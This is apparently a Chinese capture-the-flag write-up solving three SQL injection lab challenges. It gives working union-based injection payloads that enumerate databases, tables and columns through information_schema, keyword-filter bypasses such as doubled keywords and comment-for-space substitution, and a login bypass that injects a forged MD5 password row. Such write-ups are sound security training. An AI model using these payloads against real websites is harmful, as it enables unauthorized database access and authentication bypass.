LitCTF 2023\]这是什么?SQL !注一下 ! \[SWPUCTF 2022 新生赛\]ez_sql \[GXYCTF 2019\]BabySqli 点击右下角文章可跳转 #### **\[LitCTF 2023\]这是什么?SQL !注一下 !** 首先我们打开靶场查看信息,提示了闭合方式为id = (((((())))))  然后我们进行判断回显位,用order by或group by都可以,会发现2有回显,3没有回显,所以回显位为2。如果细心可以发现题目也有提示username,password也可以猜测回显位为2,如果保险起见也可以测试一下  接下来就是进行查询数据库的操作,一般来说我们用http://node5.anna.nssctf.cn:28411/?id=1)))))) union select 1,database() --+这种语句来查询,但这道题数据库有很多,而且直接查出来的数据库得到的flag是假的,所以我就不演示了,你们可以自己查查看,我们直接查询全部数据库名 我用的是union select 1,schema_name from information_schema.schemata--+来查询  可以看到有几个很可能存在flag的数据库 ctftraining和ctf,这里我就直接跟大家说第一个存在真的flag。然后进行常规的sql注入 第一步,查表名 union select 1,group_concat(table_name)from information_schema.tables where table_schema='ctftraining'--+  可以看到有一个叫flag的表名, 第二步,查列名:union select 1,group_concat(column_name)from information_schema.columns where table_name='flag'--+  最后再查询一下这个叫flag的数据就可以得到flag union select 1,group_concat(flag)from ctftraining.flag--+  #### **\[SWPUCTF 2022 新生赛\]ez_sql** 上来给了一波提示,相对安全的传参意思就是POST传参,还直接提示了参数是nss,我们先尝试随便输个数字,直接给了flag,但是这flag一看就是假的  然后用nss1 and1=1 这种手段判断类型,这题是字符型我就不演示了,然后我们要去判断回显数,会发现or和空格都被过滤了  然后我们用双写or绕过,用/\*\*/代替空格,对了这里--+也被过滤了,我们可以用#号带替--+ 我们再试一次 nss=1'/\*\*/oorrder/\*\*/by/\*\*/3# 如果是4的话会报错,所以回显数为3  然后我们用联合查询去查数据库名,这道题的union也被过滤了,同样我们双写绕过 nss=1'/\*\*/uniunionon/\*\*/select/\*\*/1,2,database()/\*\*/limit/\*\*/1,1# 后面用了limit 1,1,因为第一个回显位没有我们要的信息,我们需要跳转到第二个回显位,所以得到数据库名,NSS_db  下一步就是查表名 nss=1'/\*\*/uniunionon/\*\*/select/\*\*/1,2,group_concat(table_name)from/\*\*/infoorrmation_schema.tables/\*\*/where/\*\*/table_schema='NSS_db'/\*\*/limit/\*\*/1,1# 记得information里面的or也需要双写  根据表名的格式估计flag在NSS_tb里面,继续查列名 nss=1'/\*\*/uniunionon/\*\*/select/\*\*/1,2,group_concat(column_name)from/\*\*/infoorrmation_schema.columns/\*\*/where/\*\*/table_name='NSS_tb'/\*\*/limit/\*\*/1,1#  再继续查这里面的数据 nss=1'/\*\*/uniunionon/\*\*/select/\*\*/1,2,group_concat(id,Secr3t,flll444g)from/\*\*/NSS_db.NSS_tb/\*\*/limit/\*\*/1,1# 得到flag:NSSCTF{b734ae20-5169-4ce2-8fce-9e3a4f0c7830}NSSCTF{b734ae20-5169-4ce2-8fce-9e3a4f0c7830}  #### **\[GXYCTF 2019\]BabySqli** 这道题差点把我绕懵了 首先我们打开环境是一个登录界面,先尝试一下万能密码啥的,我这里先直接抓包,在burpsuit里面操作,发送到中继发现有一串神秘字母  拿去解密一下,发现是base32和base64的加密,解密得到 select \* from user where username = '$name' 这段代码的意思是检索你输入的username是否在数据库中存在,我们可能就大致对这道题的查询有点数,我们去测试一下回显 注意这里是过滤了or的用大小写绕过,发现为4时报错,说明回显有三个,但如果我们去实际查询表名列名会发现很难查出来,因为这道题的过滤非常严格。  那我们要用做题的经验来看,这是一道登录的界面,而列数又是三列,那估计三列分别对应id,username,password。再结合一开始解密的信息,依次去查询是否存在数据,那这三列就很有可能了 再加上我们可以发现,当我们随便输入账号密码时,弹出的是 wrong user! 当我们账户是admin时,弹出的是 wrong pass!  说明admin这个账户是存在的,但是我们不知道admin在第几列,我们可以去试一试,当放在第一列时: 提示用户名不对  放在第二列时,显示wrong pass! 说明username正确  我们知道了账号,那我们得知道密码才能登录成功,这里有一个知识点:mysql在查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5; 我们不知道密码我们可以去构造密码,用md5的形式,就比如我输的密码是123,那我用md5加密后输入到第三列,那也可以完成查询,登陆成功 123经过md5加密后结果为:202cb962ac59075b964b07152d234b70 下面实践:  得到flag: NSSCTF{ce21b171-dc0b-4b09-a56d-d6cd629ae515} 这题的密码不是唯一的,随便你密码是什么,自己构造,md5加密输入进去就行啦